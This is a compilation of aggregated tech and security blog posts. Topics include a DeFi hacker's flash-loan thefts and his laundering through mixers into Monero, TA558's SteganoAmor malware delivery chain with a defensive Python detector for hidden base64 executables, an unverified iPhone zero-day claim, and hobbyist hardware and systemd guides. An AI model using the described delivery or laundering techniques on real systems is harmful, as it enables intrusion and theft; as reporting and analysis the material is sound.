According to the US Department of Justice, in 2022, using his skills in "reverse engineering smart contracts and blockchain auditing", Ahmed hacked the decentralized cryptocurrency exchange Nirvana Finance, stealing about 3.5 million dollars from it, as well as an unnamed exchange built on the Solana blockchain platform, from which he stole more than 9 million dollars.

Interestingly, in the second case, after stealing the funds Ahmed contacted the management of the affected company and returned most of the funds, except for about 1.5 million dollars, which he kept for himself as a reward for discovering the vulnerability.

Although the name of the second affected exchange has not been disclosed, experts concluded long ago that it was Crema Finance that had been compromised. In 2022 about 9 million dollars was indeed stolen from the exchange, and a few days later the company announced that the hacker had agreed to accept a "reward" of about 1.68 million dollars and had returned the remaining assets.

Ahmed tried the same trick with Nirvana Finance. He exploited a vulnerability in the smart contract of Nirvana Finance's DeFi protocol and carried out a flash loan attack using ANA tokens bought at a low price. He then sold the tokens at a higher price, which earned him about 3.6 million dollars.

The affected company tried to recover the stolen crypto assets by offering the hacker a reward of 600,000 dollars. However, Ahmed refused to return the funds and demanded a reward of 1.4 million dollars. As a result, the company and the hacker failed to reach a compromise, and the hacker kept for himself everything that had been stolen from Nirvana Finance (that is, all of the exchange's funds).

According to investigators, after the hacks Ahmed tried to cover his tracks and used several cryptocurrency mixers, including Samourai Whirlpool, along with the Solana and Ethereum blockchains and overseas exchanges, to convert the stolen millions into Monero.

The indictment also lists some of Ahmed's searches after the attacks. Among them were: "tips on how to flee the United States to avoid criminal charges", "how to avoid extradition", "how to keep stolen cryptocurrency" and "how to buy citizenship".

The article "A former Amazon employee has been sentenced to 3 years in prison for cryptocurrency theft" comes from il blog della sicurezza informatica.




Speedify VPN Review: Pricing | Security | Performance
https://poliverso.org/display/0477a01e-8873ec17-58643ea118334e07


In this article, we delve into a detailed review of Speedify VPN, focusing on its pricing model, security features, performance, server network, and user experience. With the VPN market being highly competitive, it’s essential to scrutinize how Speedify stacks up in terms of value, safety, and efficiency. We’ll explore the various subscription options, analyze the […]





Still Up and Coming: Non-Planar FDM 3D Printing With 3 or 6 Axes
https://poliverso.org/display/0477a01e-ac699728-2a3989b9a5465f56
Printing the non-planar PLA part on top of the non-planar side of the PETG part. (Credit: Michael Wüthrich)

Most of the time FDM 3D printing involves laying down layers of thermoplastics, but the layer lines also form the biggest weakness with parts produced this way. Being able to lay out the lines to follow the part’s contours can theoretically strengthen the part and save material in the process. Recently, [Michael Wüthrich] demonstrated an approach that uses a modified Prusa Mini FDM printer to first lay out a part in PETG using non-planar printing, after which this PETG part was used to print on top of in PLA, effectively using the PETG as an easily removable support and leaving the PLA part as fully non-planar on both sides.

The modification to the Prusa Mini printer is covered on Printables along with the required parts. The main change is to give the nozzle as much clearance as possible, for which [Michael] uses the E3D Revo belt nozzle. This nozzle requires a custom holder for the Prusa Mini. After this the printer is ready for non-planar printing, but as [Michael] notes in the Twitter thread, he did not use a slicer for this, as none exists. Instead he used Matlab, a custom script and a lot of manual labor.

Non-planar FDM printing has been covered by us before, along with the need for slicers which can handle such more ‘exotic’ tasks. Hopefully with efforts like this by [Michael] such a future may be a bit closer now. If the waiting for this takes too long, or 3 axis printers seem a bit old-school, we were reminded via a tip by [Keith Olson] that it’s always possible to double the number of axes for more freedom, as in this video demonstration by [Fergal Coulter] (also embedded below), of a 6-axis 3D printer which also prints on top of an existing substrate.

https://www.youtube.com/embed/MrBOTG9cAJ8?feature=oembed




The Next Evolution Of The Raspberry Pi Recovery Kit
https://poliverso.org/display/0477a01e-5b04ae62-0ca4c18b868a016a

At Hackaday, the projects we cover are generally a one-off sort of thing. Somebody makes something, they post it online, we share it with our audience — rinse and repeat. If a project really captures people’s imaginations, it might even inspire a copy or two, which is gratifying for everyone involved. But on the rarest of occasions, we run across a project like [Jay Doscher]’s Recovery Kit.

To say that the Recovery Kit was an inspiration to others would be putting it mildly. Revolutionary would be more like it, as it resulted in more “Pi-in-a-Pelican” builds than we could possibly count. So it’s only natural that [Jay] would return to the well and produce a second version of his heavy-duty cyberdeck.

Now, technically, there have been a few other variants of the original Recovery Kit since its release in 2019, such as the easier-to-build Quick Kit. If you want to get really technical, even the Recovery Kit is actually a do-over of sorts from his original Raspberry Pi Field Unit from 2015. But [Jay] says none of the minor refreshes or revisions he’s worked on were ever substantial enough to get the official “Version 2” stamp before this one.


So, what’s changed in this new version? For one thing, it’s been optimized for reproduction by others. All the pain points that folks reported while building their own Recovery Kits have been addressed, from the time it takes to print the parts to the availability of key off-the-shelf components. Not only are the parts easier to get your hands on, but they’re also easier to assemble, with the soldered links of the original now replaced with push-on connectors.

Designed around the Raspberry Pi 5, the new Recovery Kit has also received a considerable performance boost over the previous versions. This is further extended by using a bootable NVME drive rather than the dinky SD cards most Pi builds are stuck with. Despite the computational kick in the pants, [Jay] says he’s realized that the relatively low resolutions available for the type of displays that can be crammed into a build like this are pretty poor for most graphical environments and recommends the user stick to the terminal.

In addition to the lengthy write-up about the design process behind the Recovery Kit Version Two, [Jay] has provided a comprehensive parts list with links to where you can pick up your own hardware. Having been burned by hard-to-source components in the past, this time, most of the hardware is from either Amazon or McMaster-Carr.


All in all, it’s a solid refinement of an already very well-engineered design. The only thing left now is to see if this new revision of the Recovery Kit can have the same impact on the community as its predecessor. No pressure.




A Zero-Click 0day Allows Control of iPhones at a Price of 2 Million Dollars
https://poliverso.org/display/0477a01e-6930223e-0c1b9e600e079960

Trust Wallet has urged Apple users to disable iMessage because of information about a critical zero-day vulnerability that allows hackers to take control of smartphones.

According to Trust Wallet, the vulnerability allows an attacker to break into the system and control the device. It does not even require the user to click a link (zero-click).

The vulnerability is particularly dangerous for account holders with a significant amount of funds in their account. All crypto wallets on iPhones with iMessage are at risk.

Image: Trust Wallet's tweet about the iMessage flaw (translated)

Trust Wallet's director, Eowyn Chen, shared a screenshot that, according to her, shows an exploit being sold for 2 million dollars on the dark web.

Image: Eowyn Chen's post about the exploit

However, the crypto community was skeptical of Chen's message.

Crypto analysts said that information based on a screenshot cannot be trusted unless evidence is provided. Moreover, a warning like this can cause panic. In the first 4 hours after publication, the Trust Wallet notice was viewed by more than 1.2 million users.

After a wave of doubts from experts, Trust Wallet wrote that the information about the zero-day vulnerability had been received from its security team and from partners who constantly monitor threats.

MetaRyuk, a Web3 and metaverse researcher, said that the site lists only the price of the exploit, with no demo or confirmation of authenticity. In addition, the site itself has no reputation on the dark web and could turn out to be a scam, just like other similar sites. The specialist stressed that at this stage there are not enough details to assess how much trust the offer deserves.

Apple has not commented on the situation.

The article "A Zero-Click 0day Allows Control of iPhones at a Price of 2 Million Dollars" comes from il blog della sicurezza informatica.




Malware Inside Images. Discovering Steganography in the SteganoAmor Campaign
https://poliverso.org/display/0477a01e-cba5f088-58c9c83175167665

The new campaign by the hacker group TA558 is called SteganoAmor, because the hackers use steganography and hide malicious code inside images. Specialists at Positive Technologies report that the group uses long attack chains that include various tools and malware, among them Agent Tesla, FormBook, Remcos, Lokibot, Guloader, SnakeKeylogger, XWorm, NjRAT and EkipaRAT.

Positive Technologies experts discovered attacks around the world associated with the TA558 group. As originally described by ProofPoint researchers, TA558 is a small group that since 2018 has targeted organizations in the hospitality and tourism sector, mainly in Latin America, but it has also been seen targeting North America and Western Europe.

In the attacks now analyzed, the group made active use of steganography: payload files (in the form of VBS and PowerShell scripts, and RTF documents with an embedded exploit) were delivered inside images and text files.

The researchers noted that most of the RTF documents and VB scripts had names such as greatloverstory.vbs, easytolove.vbs and iaminlovewithsomeoneshecuteandtrulyyoungunluckyshenotundersatnd_howmuchiloveherbutitsallgreatwithtrueloveriamgivingyou.doc. That is, they were associated with the word “love”, which is why the operation was named SteganoAmor.

Typically, TA558 attacks begin with malicious e-mails containing seemingly harmless attachments (Excel and Word files). These documents exploit the vulnerability CVE-2017-11882, which was fixed in 2017.

Notably, the e-mails are sent from compromised SMTP servers, to minimize the chance that the messages are blocked, since they come from legitimate domains.

If the victim has an older version of Microsoft Office installed, the exploit downloads a VBS script from the legitimate paste[.]ee service, which is then executed to produce an image file (JPG) containing a base64-encoded payload.

Image: Image used in the attack

The base64-encoded payload for the next stage of the attack contains a PowerShell command inside the script.

Next, the script decodes the payload from the image and downloads the additional payload from the same URL, which is written as a reversed string (that is, back to front). Note that the content is also a base64-encoded executable file, but reversed.

Image: Malicious code inside a text file
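
The two encodings described above (base64 inside an image, and reversed base64 in a text file) can be checked for during triage. The Python below is an added example, not code from the Positive Technologies report or from the original article; it assumes the hidden payload is a Windows executable (decoded bytes begin with MZ), uses a 64-character threshold chosen for illustration, and its function names and sample data are constructed.

```python
import base64
import re

# A run of base64 alphabet long enough to carry a payload; 64 is an assumed threshold.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}")


def _decodes_to_pe(chars: bytes) -> bool:
    """Decode the first 64 base64 characters and look for the PE 'MZ' magic."""
    return base64.b64decode(chars[:64], validate=True).startswith(b"MZ")


def find_hidden_pe(data: bytes) -> list[tuple[int, str]]:
    """Return (offset, orientation) for each base64 run that decodes to a PE header.

    orientation is "forward" for plain base64 and "reversed" when the run only
    decodes to a PE header after the string is flipped back to front.
    """
    findings = []
    for match in B64_RUN.finditer(data):
        run = match.group()
        if _decodes_to_pe(run):
            findings.append((match.start(), "forward"))
        elif _decodes_to_pe(run[::-1]):
            findings.append((match.start(), "reversed"))
    return findings


# --- Constructed samples (not campaign artefacts) ---
FAKE_PE = b"MZ" + b"\x90\x00" * 40   # harmless stub that only carries the magic
FAKE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16 + b"\xff\xd9"
IMAGE_WITH_PAYLOAD = FAKE_JPEG + base64.b64encode(FAKE_PE)
REVERSED_TEXT = base64.b64encode(FAKE_PE)[::-1]
BENIGN_IMAGE = FAKE_JPEG + base64.b64encode(b"A" * 90)

if __name__ == "__main__":
    for name, blob in [("image", IMAGE_WITH_PAYLOAD),
                       ("reversed text", REVERSED_TEXT),
                       ("benign image", BENIGN_IMAGE)]:
        print(f"{name}: {find_hidden_pe(blob)}")
```

A run that starts on a stray alphabet character from the surrounding binary data would be misaligned and missed, so treat a clean result as "nothing found by this check", not as proof the file is benign.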
In their report the experts stress that TA558 sometimes uses different attack chains even for the same malware, not to mention different malware. The hackers use malware such as Agent Tesla, Remcos, XWorm, LokiBot, GuLoader, FormBook and Snake Keylogger.

The stolen information is ultimately sent to previously hacked FTP servers, which the attackers use as control infrastructure so that the traffic does not arouse suspicion.

In total, Positive Technologies specialists identified more than 320 attacks aimed at companies in 31 countries, including the United States, Germany and India. Among the hardest-hit sectors are industry (21%), services (16%), the public sector (16%), electric power (8%) and construction (8%).

The article "Malware Inside Images. Discovering Steganography in the SteganoAmor Campaign" comes from il blog della sicurezza informatica.




Fail of the Week: Can an Ultrasonic Cleaner Remove Bubbles From Resin?
https://poliverso.org/display/0477a01e-35080bb7-1028206e800fc6a3
Fail of the Week: Can an Ultrasonic Cleaner Remove Bubbles From Resin? [Wendy] asked a very good question. Could putting liquid resin into an ultrasonic cleaner help degas it https://www.youtube.com/watch?v=dGfSJKhEGc0? Would it help remove bubbles, resulting in a cleaner pour and nicer end product? What we love is that she tried it out and shared her results.




[Wendy] asked a very good question. Could putting liquid resin into an ultrasonic cleaner help degas it? Would it help remove bubbles, resulting in a cleaner pour and nicer end product? What we love is that she tried it out and shared her results. She purchased an ultrasonic cleaner and proceeded to mix two batches of clear resin, giving one an ultrasonic treatment and leaving the other untouched as a control.

Image: Sadly, the test piece had considerably more surface bubbles than the untreated control, as well as a slight discoloration.

The results were interesting and unexpected. Initially, the resin in the ultrasonic bath showed visible bubbles rising to the surface which seemed promising. Unfortunately, this did not lead to fewer bubbles in the end product.

[Wendy]’s measurements suggest that the main result of putting resin in an ultrasonic bath was an increase in its temperature. Overheating the resin appears to have led to increased off-gassing and bubble formation prior to and during curing, which made for poor end results. The untreated resin by contrast cured with better color and much higher clarity. If you would like to skip directly to the results of the two batches, it’s right here at 9:15 in.

Does this mean it’s a total dead end? Maybe, but even if the initial results weren’t promising, it’s a pretty interesting experiment and we’re delighted to see [Wendy] walk through it. Do you think there’s any way to use the ultrasonic cleaner in a better or different way? If so, let us know in the comments.

This isn’t the first time people have tried to degas epoxy resin by thinking outside the box. We’ve covered a very cheap method that offered surprising results, as well as a way to use a modified paint tank in lieu of purpose-made hardware.




Linux Fu: Stupid Systemd Tricks
https://poliverso.org/display/0477a01e-2fbe3c20-a7637e7db732067c


Last time, I gave a whirlwind introduction to a very small slice of systemd. If you aren’t comfortable with systemd services, timers, and mounts, you might want to read that now. Otherwise, press on to see a few interesting uses for custom systemd units, including running a few things on a schedule and automatically mounting a Raspberry Pi Zero.

Can you do every one of these things in a different way? Of course you can. I’m not debating the relative merits of using or not using systemd. However, unless you totally control your own environment, there is a good chance you are going to have to interact with systemd at some point.

Stupid Trick #1: Update Your IP Address


A few years ago, I talked about updating your remote DNS server with your public IP address. This lets you refer to a hostname like snoopy.hackaday.com and get back to your computer that often changes IP addresses. Sure, you can get services to do that for you, but you must either pay or agree to read ads on their site to keep your hostname going. This is all under your control. In the original post, I suggested using cron or NetworkManager to run the update script. I also hinted you could do it with systemd, but I didn’t tell you how. Let’s fix that.

Step one is simple: create a “one shot service” that executes the command required:

[Unit]
Description=Update IP via SSH (called by timer)

[Service]
Type=oneshot
ExecStart=/usr/bin/ssh awce ./updateip - wd5gnr.com dyn E
WorkingDirectory=/home/alw/bin

You can read about why that works in the original post. This is an easy-to-understand unit. A one-shot service runs once and then it is done. The rest is the program to run and the working directory. Piece of cake.

Next, you need a timer. The timer’s name is the same as the service except for the extension. That is, updateip.service and updateip.timer go together.

[Unit]
Description=Timer to update public IP via SSH

[Timer]
OnCalendar=*-*-* *:01,16,31,46:00
Persistent=true

[Install]
WantedBy=timers.target

Here, we ask the system to run the code every hour of every day at minutes :01, :16, :31, and :46. It is persistent, so if a timer misses, it will run as soon as possible. In theory, we should make this all dependent on the network being up, but it doesn’t hurt to try and fail since if the network is down, this doesn’t matter.

Stupid Trick #2: Shut Up Baloo!


Recent versions of KDE love Baloo, the file indexer. While it is nice to instantly find files in your home directories, and it handles a few other tasks, it also is known to eat up system resources. I’ve used cgroups and other tricks to limit Baloo’s insatiable desire for CPU and I/O time. But what works best is to shut it down in the morning and let it start again late at night.

This is not quite the same as updating the IP address. For one thing, it happens at an absolute time. It would be easy, too, to have it do different times on the weekend, for example. The other thing to note is that this timer, as it is now, should probably not be persistent. It might be smarter to make it persistent and have one script that decides what to do based on the time, but I didn’t elect to go that way.

However, I did want to stop the timer from running if there was no GUI session. This is, it turns out, tricky. You’d think you could set the timer to be “WantedBy” the GUI target, but that’s not the case. Here’s how I turn off Baloo:


[Unit]
Description=Stop KDE's Baloo File Indexing Service
# Ensure this only runs in a graphical session by checking for the DISPLAY variable
ConditionEnvironment=DISPLAY

[Service]
Type=oneshot
ExecStart=/usr/bin/systemctl --user stop kde-baloo

Note that the service actually calls systemd again to stop the predefined kde-baloo service. The ConditionEnvironment line means it only does this if there is a DISPLAY variable set. That’s not foolproof, but it should work for most cases.

You still need a timer:

[Unit]
Description=Timer to Stop KDE's Baloo File Indexing Service Daily at 06:45

[Timer]
OnCalendar=*-*-* 06:45:00
Persistent=true
Unit=baloo-off.service

[Install]
WantedBy=timers.target

Of course, the baloo-on pair looks just the same, with obvious changes to the service names and time specifications.

Stupid Trick #3: Automount your Raspberry Pi Pico


Another item systemd handles is mounting filesystems. What happened to fstab? Nothing. A special program reads fstab and creates systemd mount units for you automatically. The unit files wind up somewhere like /run/systemd/generator, at least on my system.

If you use the Raspberry Pi Pico, you’ve probably noticed that when it is in boot mode, it presents a different ID to the system each time. That makes it hard to tell the system to mount it automatically. However, it should have a constant label. Making systemd automount your Pi requires two files (in /etc/systemd/system). First, there is the .mount file:


[Unit]
Description=Mount Raspberry Pi Pico at startup

[Mount]
What=/dev/disk/by-label/RPI-RP2
Where=/media/alw/RPI-RP2
Type=vfat
Options=defaults

[Install]
WantedBy=multi-user.target

Then there is a .automount file with the same base name:


[Unit]
Description=Automount Raspberry Pi Pico

[Automount]
Where=/media/alw/RPI-RP2
TimeoutIdleSec=0

[Install]
WantedBy=multi-user.target

Speaking of the name, systemd expects a file that mounts at path /x/y/z to be named x-y-z.mount. That’s fine until you want to mount something at path /x/y-z. That’s because the name x-y-z.mount should go to /x/y/z, not /x/y-z. To solve this, the file name needs to have an escaped hyphen in it like this: media-alw-RPI\x2dRP2.mount. That backslash needs to actually be in the file name, so you’ll have to quote or escape it in the shell, too.

Now, when you boot the Pi into bootloader mode, the system will mount it at the designated location.
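
The unit file naming rule described above can be worked through in code. This Python is an added example, not part of the original article or of systemd; it re-implements the path escaping rules from systemd.unit(5) for illustration, and the function names are hypothetical. On a real system, `systemd-escape -p --suffix=mount /media/alw/RPI-RP2` gives the same answer.

```python
import re

# Characters systemd leaves unescaped in unit names: ASCII alphanumerics, ':', '_', '.'
SAFE = re.compile(r"[A-Za-z0-9:_.]")


def unit_name_from_path(path: str, suffix: str = "mount") -> str:
    """Escape an absolute mount path into the unit file name systemd expects."""
    parts = [p for p in path.split("/") if p]   # drops leading, trailing, doubled slashes
    if any(p in (".", "..") for p in parts):
        raise ValueError("path must not contain '.' or '..' components")
    if not parts:
        return f"-.{suffix}"                    # the root directory is a special case
    out = []
    for i, byte in enumerate("/".join(parts).encode("utf-8")):
        ch = chr(byte)
        if ch == "/":
            out.append("-")                     # path separator becomes a hyphen
        elif SAFE.fullmatch(ch) and not (i == 0 and ch == "."):
            out.append(ch)
        else:
            out.append(f"\\x{byte:02x}")        # everything else, a literal '-' included
    return "".join(out) + "." + suffix


def path_from_unit_name(name: str) -> str:
    """Reverse the escaping: the mount point a given unit file name refers to."""
    stem = name.rsplit(".", 1)[0].encode("utf-8")
    if stem == b"-":
        return "/"
    unhex = lambda m: bytes([int(m.group(1), 16)])
    parts = [re.sub(rb"\\x([0-9a-fA-F]{2})", unhex, p) for p in stem.split(b"-")]
    return "/" + b"/".join(parts).decode("utf-8")


if __name__ == "__main__":
    for p in ["/x/y/z", "/x/y-z", "/media/alw/RPI-RP2"]:
        print(p, "->", unit_name_from_path(p))
    # An unescaped hyphen in the file name is read as a directory separator:
    print("media-alw-RPI-RP2.mount ->", path_from_unit_name("media-alw-RPI-RP2.mount"))
```

The last line shows why the escape matters: without it, systemd would treat the unit as belonging to /media/alw/RPI/RP2 rather than /media/alw/RPI-RP2.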

That’s a Wrap!


Actually, that’s not a wrap. This shows nearly the bare minimum of what you can do with systemd. There is a question if it is desirable for one thing to do so much, but I’m trying to ignore that elephant. For today, systemd is here, and we might as well use it. If you work with others or deliver software to other users, it is a good bet you’ll have no choice.

